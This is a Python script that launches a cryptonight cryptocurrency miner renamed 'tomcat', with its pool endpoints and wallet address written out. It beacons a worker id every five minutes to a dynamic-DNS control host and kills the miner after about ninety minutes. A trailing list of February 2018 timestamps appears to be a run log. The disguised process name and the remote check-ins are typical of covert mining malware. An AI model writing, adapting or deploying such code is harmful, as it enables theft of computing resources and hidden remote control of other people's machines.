import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:53:06.847219
#2018-02-17 16:41:07.024902
#2018-02-17 18:28:04.951119
#2018-02-17 20:17:07.310274
#2018-02-17 22:05:01.322209
#2018-02-17 23:48:07.224997
#2018-02-18 01:37:05.837399
#2018-02-18 03:24:03.463104
#2018-02-18 05:11:04.273662
#2018-02-18 07:03:01.399683
#2018-02-18 08:50:08.008256
#2018-02-18 10:37:05.059578
#2018-02-18 12:22:03.667749
#2018-02-18 14:08:06.280999
#2018-02-18 15:58:06.350299
#2018-02-18 17:48:04.948308
#2018-02-18 19:36:03.567664
#2018-02-18 21:21:04.585868
#2018-02-18 23:09:04.893766
#2018-02-19 00:56:04.064064
#2018-02-19 02:43:02.107602
#2018-02-19 04:30:09.068774
#2018-02-19 06:17:05.844041
#2018-02-19 08:05:08.599933
#2018-02-19 09:55:08.571944
#2018-02-19 11:44:08.523365
#2018-02-19 13:31:01.859891
#2018-02-19 15:19:06.998635
#2018-02-19 17:07:05.958552
#2018-02-19 18:52:07.298513
#2018-02-19 20:29:08.007307
#2018-02-19 22:17:01.525838
#2018-02-20 00:04:06.995520
#2018-02-20 01:52:01.900879
#2018-02-20 03:40:08.336692
#2018-02-20 05:27:03.172113
#2018-02-20 07:11:07.830059
#2018-02-20 08:57:08.241843
#2018-02-20 10:40:04.423998
#2018-02-20 12:25:10.297015
#2018-02-20 14:11:08.476226
#2018-02-20 15:55:01.379292
#2018-02-20 17:40:09.747018
#2018-02-20 19:28:08.168430
#2018-02-20 21:16:07.772236
#2018-02-20 23:00:11.567138
#2018-02-21 00:45:04.312639
#2018-02-21 02:30:08.530064
#2018-02-21 04:17:08.119316
#2018-02-21 06:04:04.214989
#2018-02-21 07:51:07.309273
#2018-02-21 09:37:08.023545
#2018-02-21 11:27:09.697740
#2018-02-21 13:16:01.908846
#2018-02-21 15:01:12.105607
#2018-02-21 16:53:11.818844
#2018-02-21 18:42:05.051382
#2018-02-21 20:26:07.381207
#2018-02-21 22:15:04.324898
#2018-02-22 00:07:08.028098
#2018-02-22 01:54:07.529604
#2018-02-22 03:41:03.868717
#2018-02-22 05:28:04.273193
#2018-02-22 07:13:01.386959
#2018-02-22 08:59:05.471371
#2018-02-22 10:47:08.191366
#2018-02-22 12:33:05.935102
#2018-02-22 14:17:09.378547
#2018-02-22 16:04:05.834898
#2018-02-22 17:50:03.487909
#2018-02-22 19:36:02.027610
#2018-02-22 21:28:07.012872
#2018-02-22 23:14:07.711447
#2018-02-23 01:01:07.963259
#2018-02-23 02:49:04.107443
#2018-02-23 04:37:07.679235
#2018-02-23 06:23:05.938385
#2018-02-23 08:11:07.399871
#2018-02-23 10:28:01.264851
#2018-02-23 12:21:04.865673
#2018-02-23 14:10:04.171360
#2018-02-23 15:59:07.867590
#2018-02-23 17:44:08.004879
#2018-02-23 19:32:04.601105
#2018-02-23 21:15:09.162919
#2018-02-23 23:03:06.781623
#2018-02-24 00:51:07.745814
#2018-02-24 02:34:07.352569
#2018-02-24 04:28:02.018150
#2018-02-24 06:13:05.882257
#2018-02-24 08:01:07.197900
#2018-02-24 09:45:06.016937
#2018-02-24 11:39:05.587334
#2018-02-24 13:29:07.644427
#2018-02-24 15:18:07.434327
#2018-02-24 17:08:03.896560
#2018-02-24 18:59:04.048936
#2018-02-24 20:47:02.174933
#2018-02-24 23:03:02.120023
#2018-02-25 02:20:03.778409
#2018-02-25 05:41:07.511506
#2018-02-25 11:36:04.622657